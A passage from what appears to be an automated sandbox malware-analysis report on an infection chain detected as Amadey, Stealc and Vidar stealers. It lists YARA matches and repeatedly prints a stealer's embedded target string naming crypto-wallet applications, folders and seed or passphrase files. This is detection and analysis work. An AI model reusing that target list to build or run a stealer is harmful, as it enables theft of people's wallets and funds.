Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00E9CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00E9CBEA
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.skotes.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.g4Cyr2T5jq.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2635193986.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170764560.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2193890325.0000000000E81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2153124653.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2204100473.0000000000E81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2084121565.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2162980289.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3325796292.0000000000E81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 0000000A.00000003.2995975951.0000000001160000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3235221216.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 88edf6a100.exe PID: 6848, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 32.0.num.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.num.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.num.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.num.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.7e96f85771.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.7e96f85771.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000000.2989582448.0000000000041000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2874827283.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3246728822.0000000000041000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3198812078.0000000000811000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3294064739.0000000001447000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3248429652.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3201845149.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3286511778.0000000000041000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3168952289.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.3018637776.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.3150281953.0000000000041000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7e96f85771.exe PID: 1672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 00000008.00000002.3168952289.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7e96f85771.exe PID: 1672, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 